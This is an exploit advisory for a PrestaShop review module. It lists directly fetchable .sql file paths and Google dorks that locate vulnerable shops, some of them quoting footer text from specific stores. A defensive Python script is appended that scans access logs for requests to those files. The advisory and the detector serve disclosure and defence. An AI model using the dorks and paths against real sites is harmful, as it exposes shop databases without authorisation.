PrestaShop Google GSnippetsReviews Modules 1.6.1.4 Database Backup Disclosure

2019.01.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

####################################################################

# Exploit Title : PrestaShop Google GSnippetsReviews Modules 1.6.1.4 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/01/2019
# Vendor Homepage : prestashop.com
# Software Download Link : addons.prestashop.com/en/seo-natural-search-engine-optimization/6144-customer-ratings-and-reviews-pro-google-rich-snippets.html
+ sourceforge.net/projects/prestashopratingreview/
+ codecanyon.net/item/prestashop-products-review-google-rich-snippets-module/20545945
+ storeprestamodules.com/prestashop-modules-google-snippets-product-reviews.html
# Software Price : 100 Euro
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.11.0± - 1.4.7.0 - 1.4.6.2 - 1.5.4.0 - 1.5.6.1 - 1.5.6.2 - 1.5.3.1 - 1.6.0.12± - 1.6.1.1± - 1.6.1.4±
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/gsnippetsreviews/sql/''
intext:''© 2013 - Vinta Quatre. Tous droits réservés - Création Yellow Agence Internet''
intext:''© 2018 - DECO LED VLC''
intext:''Powered by e-com''
intext:''© 2018 Sud Corner tous droits réservés''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
# PacketStormSecurity Exploit Reference Link : packetstormsecurity.com/files/150904/PrestaShop-Google-GSnippetsReviews-1.6.1.4-Database-Disclosure.html

####################################################################

# Exploit :

/modules/gsnippetsreviews/sql/install.sql
/modules/gsnippetsreviews/sql/uninstall.sql
/modules/gsnippetsreviews/sql/update-date-rating.sql
/modules/gsnippetsreviews/sql/update-lang-review.sql
/modules/gsnippetsreviews/sql/update-voucher-fb.sql

###################################################################

# Example Vulnerable Sites =>

####################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
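To see whether a shop's own web server has been serving these files, its access log can be checked for requests to the module's sql/ directory. The following is an added example, not part of the original advisory: it scans Combined Log Format lines for requests to any module's sql/ directory (a generalization of the gsnippetsreviews paths listed above, including sub-directory installs) and reports whether the server delivered the file. The log format and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Any module's sql/ directory, at the web root or under a sub-directory install.
SQL_RE = re.compile(r'/modules/([^/]+)/sql/([^/]+\.sql)$', re.IGNORECASE)

def normalize(target):
    """Drop the query string, percent-decode, and collapse repeated slashes."""
    path = unquote(target.split('?', 1)[0])
    return re.sub(r'/{2,}', '/', path)

def find_sql_requests(lines):
    """Return one finding per logged request for a module .sql file."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        client, when, method, target, status = m.groups()
        hit = SQL_RE.search(normalize(target))
        if not hit:
            continue
        status = int(status)
        findings.append({
            "client": client, "time": when, "method": method,
            "module": hit.group(1).lower(), "file": hit.group(2).lower(),
            "status": status,
            # 2xx: content was sent; 304: the client already holds a copy
            "disclosed": 200 <= status < 300 or status == 304,
        })
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2019:10:00:01 +0100] "GET /modules/gsnippetsreviews/sql/install.sql HTTP/1.1" 200 5120 "-" "curl/7.61"',
    '203.0.113.7 - - [01/Jan/2019:10:00:02 +0100] "GET /shop/modules/gsnippetsreviews/sql/uninstall.sql?x=1 HTTP/1.1" 403 199 "-" "curl/7.61"',
    '198.51.100.9 - - [01/Jan/2019:10:05:00 +0100] "GET /modules/gsnippetsreviews/sql/update%2Dvoucher%2Dfb.sql HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jan/2019:10:05:09 +0100] "GET /modules/gsnippetsreviews/views/css/hook.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_sql_requests(SAMPLE):
        state = "DISCLOSED" if f["disclosed"] else "blocked"
        print(f'{f["time"]} {f["client"]} {f["module"]}/{f["file"]} {f["status"]} {state}')
```

Findings marked as blocked indicate the server already denies access to the directory; findings marked as disclosed indicate the .sql files are reachable and access to them should be denied at the web server.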


Copyright 2019, cxsecurity.com

 
